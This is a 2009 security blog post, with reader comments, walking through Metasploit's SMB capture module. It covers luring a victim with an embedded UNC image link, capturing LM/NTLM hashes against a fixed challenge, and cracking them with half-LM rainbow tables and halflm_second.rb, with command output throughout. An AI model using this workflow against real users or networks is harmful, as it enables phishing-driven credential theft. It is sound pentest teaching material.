Monday, April 6, 2009

Using the Metasploit SMB Sniffer Module

There has been some talk about using the SMB Relay module in Metasploit and then trying to crack those hashes. I'll spare the links to protect the uninformed.

The SMB Relay module is for doing just what it says, relaying the SMB session back to another host. It used to be the same host but now, post 08-068, you have to pick another system on the network. Doesn't matter what system, just not the same system. (I'll try to cover this in another blog post soon)

Additionally, the SMB Relay module provides a random challenge for each attempt and doesn't log those challenges anywhere that you could go back and use. So that pretty much rules out using the hashes you see in the output for password cracking.

For background it looks like this which looks just like the one that will work :-(

[*] Received 192.168.0.103:2281 XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

So what are we to do? Use the SMB Sniffer module of course!

The SMB sniffer module allows you to capture LM/NTLM hashes that can be cracked later. It uses a known challenge key which allows you to crack the hash offline.
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > info

Name: Authentication Capture: SMB
Version: 5966

Provided by:
hdm

Description:
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

We need to force a victim to authenticate to metasploit. The easiest way is to embed a UNC link into a webpage or email.

Example: img src="\\networkIP\share\1.gif"

Once the victim's browser tries to authenticate, the sniffer module will capture the hashes (which can be cracked later using rainbow tables). You'll notice the difference between this module and SMB Relay which issues a random challenge making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module, if you want to try to get a shell use the smb_relay exploit module.

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
[*] Auxiliary module running as background job
msf auxiliary(smb) >
[*] Server started.
[*] Captured 192.168.0.101:57794 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:44641 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:49777 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1

We can now use HALFLM rainbow tables with the 1122334455667788 challenge to crack the first half of the password.

**We only take the first 16 characters of the LM hash output

LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d


We can then use rainbow tables to crack the first half:

$ ./rcracki *.rti -h 76365e2d142b5612
halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti:
reading...
264241152 bytes read, disk access time: 4.97 s
verifying the file...
searching for 1 hash...
plaintext of 76365e2d142b5612 is PASSWOR
cryptanalysis time: 5.24 s

statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 4.97 s
total cryptanalysis time: 5.24 s
total chain walk step: 1783216
total false alarm: 591
total chain walk step due to false alarm: 703255

result
-------------------------------------------------------
76365e2d142b5612 PASSWOR hex:50415353574f52

You will have to guess or bruteforce the rest :-( but thankfully there is a tool in your metasploit tools directory to help you do just that!

$ ruby halflm_second.rb

Usage: halflm_second.rb

OPTIONS:

-h Display this help information
-n The encypted LM hash to crack
-p The decrypted LANMAN password for bytes 1-7

$ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR
[*] Trying one character...
[*] Cracked: PASSWORD

19 comments:

Dizzle said...

Great Work. Very Interesting.

Cheers on the top 5 ranking. You deserve it. Lots of work goes into these articles.

Looking forward to the article about SMB relaying. Does the 3rd party in the attack have to be a DC or will any domain member work?

Cl@rity_533k4 said...

Very interesting article..

Btw did you leave a number in the challenge out on purpose or is it a type mismatch..

CG said...

i didnt leave anything out on purpose. can you give me a bit more detail on what you are asking?

Anonymous said...

nice work but i have one question i saw u didnt use the 112233455667788 challenge.
is it necessary for the rainbow attack ?

CG said...

The SMB sniffer handles the challenge

John Fairfield said...

Great stuff...
Quick question though, when I attempt to connect to the share from an XPSP3 VM (not in a domain), the responses it automatically sends first are not the right hashes. The LM hash is always cd72dfc6e6d040a4cd72dfc6e6d040a4cd72dfc6e6d040a4 (tried it from a number of systems). However, if I type the username and pass in the popup auth box, then the right hashes are sent.

What could be the reason that the system is not trying to automatically authenticate with the right creds?

Appreciate the help and congrats on the top 5, you deserve it.

Cl@rity_533k4 said...

As far I know the static challenge is:
1122334455667788
so there is a missing 4 in yours.
Regards.

CG said...

@Cl@rity_533k4

yeah, i see now, there was a typo in the post. I added the other 4

@john i have no idea. sorry.

Anonymous said...

Can you advise where to get the rcracki for linux src code that works? The reerainbowtables forum and bulletin board just seems to think the src code is corrupted and offers very little advice on the multitude of compilation errors. Or perhaps you could advise how to compile in linux. Thanks

Anonymous said...

Hmm
If the attacker was sitting out on the Internet and sent a phishing email to users behind a corporate firewall this should still work yes? The clients would open the email, with the url you mention and then attempt to authenticate true?

Anonymous said...

Authentication only works if site is in internal zone. Else Iexplorer won' t do NTLM auth with logged on credentials

solardiz said...

Instead of halflm_second.rb, you could use John the Ripper with the jumbo patch applied, which contains:

host!user:~/john/john-1.7.6-jumbo-4$ ls doc/NETNTLM_README src/*NET*LM*
doc/NETNTLM_README src/NETLM_fmt.c src/NETNTLM_fmt.c
src/NETHALFLM_fmt.c src/NETLMv2_fmt.c src/NETNTLMv2_fmt.c

This stuff was contributed by JoMo-Kun. You can also find some info on it (and an older revision of it) on his website:

http://www.foofus.net/~jmk/smbchallenge.html

Just thought I'd mention this option as well.

CG said...

@solardiz

cool thanks!

aerokid240 said...

Hey man great post. My problem now is getting rcracki to compile/install on BT 4. Any suggestions/pointers on how you got yours up and running.

CG said...

@aerokid240

without any errors i or anyone else probably cant help you.

Anonymous said...

@John:

windows tries anonymous logons first

Jim said...

Great article Chris.
Problem I'm having is that rcracki can't find the hash you mentioned in your article.
1. I copied the four tables and four index files to /tables on a BT5RC2 box.
2. I did rcracki *.rti -h 76365e2d142b5612 and rcracki told me it couldn't find the hash.
Not sure what I did wrong.
Compilation of rcracki went with some warnings but no errors. Binary seemed to work ok just can't find the PASSWOR hash in the downloaded tables. Have you had troubles with corrupted tables maybe?

Anonymous said...

Chris, your article is 3 years old and still providing value! Just helped me in a pentest to crack the password for an LM challenge/response I gathered from an ettercap smb mitm and gain that first foothold. One thing that should be noted for everyone, which Chris did use but I missed it the first around, is you *must* use msf's "auxiliary/server/capture/smb" Some ettercap mitm smb videos use the smbrelay exploit instead. Do *not* use smbrelay if your goal is to crack LM challenge/response passwords using rainbow tables because it will not set the server challenge to be 1122334455667788 (capture/smb does) and the stock lhhalfchall rainbow tables out on the net (GARR) appear to have been generated using that default challenge. Of course you could generate your own rainbow tables using your server challenge or rely on John or Cain brute force with a supplied challenge but good luck with that finishing within your engagement timeframe if it's a decent password.

Anonymous said...

This does not work if the user is using chrome or firefox.